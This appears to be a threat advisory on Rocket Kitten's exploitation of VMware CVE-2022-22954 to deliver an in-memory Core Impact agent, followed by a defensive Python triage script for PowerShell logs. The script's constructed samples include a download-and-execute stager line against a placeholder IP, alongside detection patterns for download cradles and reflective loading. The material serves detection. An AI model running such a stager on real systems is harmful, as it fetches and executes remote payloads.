CVSS v3.1: 9.8 (Critical)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v2: 10.0 (High)
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
THREAT LEVEL: Red.

An Iranian cyber-espionage group known as Rocket Kitten has begun deploying the Core Impact penetration-testing framework on vulnerable systems by exploiting a recently patched critical vulnerability in VMware Workspace ONE Access and Identity Manager. The attackers use the VMware Identity Manager service flaw (CVE-2022-22954, a server-side template injection that gives an unauthenticated network attacker remote code execution) to gain initial access to the target, then drop a PowerShell stager that downloads the next-stage payload, dubbed PowerTrash Loader. PowerTrash Loader is a heavily obfuscated PowerShell script of roughly 40,000 lines; at the end of the attack chain it loads the Core Impact agent directly into memory, so no Core Impact binary is written to disk for file-based scanning to catch.

MITRE ATT&CK TTPs commonly used by Rocket Kitten:

Tactics
TA0001: Initial Access
TA0002: Execution
TA0006: Credential Access
TA0009: Collection
TA0011: Command and Control

Techniques
T1059: Command and Scripting Interpreter
T1189: Drive-by Compromise
T1555.003: Credentials from Password Stores: Credentials from Web Browsers
T1105: Ingress Tool Transfer
T1056.001: Input Capture: Keylogging
T1566.001: Phishing: Spearphishing Attachment
T1566.003: Phishing: Spearphishing via Service
T1204.002: User Execution: Malicious File

Patch Links
https://www.vmware.com/security/advisories/VMSA-2022-0011.html

References
https://blog.morphisec.com/vmware-identity-manager-attack-backdoor
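The chain above (stager with a download cradle, an oversized obfuscated loader, payload loaded in memory) leaves traces in PowerShell script-block logging even when nothing touches disk. The following triage script is an added example written for this page, not code from the advisory, from Morphisec or from VMware: it scores logged script blocks on generic indicators of that pattern. The regexes, score weights, the 10,000-line threshold and the entropy cut-off are assumptions chosen for illustration, and the three sample script blocks are constructed, not real telemetry.

```python
"""Heuristic triage of PowerShell script-block log text (e.g. Event ID 4104 ScriptBlockText)
for the stager -> obfuscated loader -> in-memory payload pattern.
Added illustration; the indicators and thresholds are generic assumptions."""
import base64
import math
import re
from collections import Counter
from dataclasses import dataclass

# Download cradles a stager typically uses to fetch a next-stage script.
DOWNLOAD_CRADLE = re.compile(
    r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b",
    re.IGNORECASE,
)
# Constructs used to execute or load a payload in memory instead of from a file on disk.
IN_MEMORY_LOAD = re.compile(
    r"\[(System\.)?Reflection\.Assembly\]::Load|VirtualAlloc|Invoke-Expression|\bIEX\b",
    re.IGNORECASE,
)
# A long run of base64 characters usually means an embedded binary payload.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def shannon_entropy(text: str) -> float:
    """Bits per character; obfuscated or packed content scores higher than hand-written code."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


@dataclass
class Finding:
    record_id: str
    score: int
    reasons: list


def triage(record_id: str, script_text: str, line_threshold: int = 10_000) -> Finding:
    """Score one logged script block. Weights and thresholds are assumptions for this example."""
    reasons, score = [], 0
    if DOWNLOAD_CRADLE.search(script_text):
        score += 2
        reasons.append("download cradle")
    if IN_MEMORY_LOAD.search(script_text):
        score += 2
        reasons.append("in-memory load")
    lines = script_text.count("\n") + 1
    if lines >= line_threshold:
        score += 2
        reasons.append("very long script")
    if BASE64_BLOB.search(script_text):
        score += 1
        reasons.append("long base64 blob")
    # Entropy is only meaningful on a reasonably large sample; skip short one-liners.
    if len(script_text) >= 500 and shannon_entropy(script_text) > 5.0:
        score += 1
        reasons.append("high entropy")
    return Finding(record_id, score, reasons)


def rank(records: dict) -> list:
    """Triage every record and return the findings, most suspicious first."""
    return sorted((triage(rid, txt) for rid, txt in records.items()),
                  key=lambda f: f.score, reverse=True)


# Constructed sample script blocks (not real telemetry): a benign admin one-liner,
# a stager-style download cradle, and a synthetic oversized loader with an embedded blob
# that is reflectively loaded from a base64 string.
BENIGN = "Get-Service | Where-Object { $_.Status -eq 'Running' } | Sort-Object Name"
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage2.ps1')"
LOADER = ("\n".join(f"$x{i} = [char]({(i * 7) % 26} + 65)" for i in range(12_000))
          + "\n$b = '" + base64.b64encode(bytes(range(256)) * 3).decode() + "'\n"
          + "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($b)) | Out-Null")
SAMPLES = {"benign": BENIGN, "stager": STAGER, "loader": LOADER}

if __name__ == "__main__":
    for f in rank(SAMPLES):
        print(f"{f.record_id:8} score={f.score} {', '.join(f.reasons)}")
```

The scores are a ranking aid for an analyst, not a verdict: administrative tooling also uses `Invoke-WebRequest` and reflective loading, so feed the top-ranked blocks into a review of the process tree (what spawned `powershell.exe` on the Workspace ONE host) rather than alerting on a single indicator.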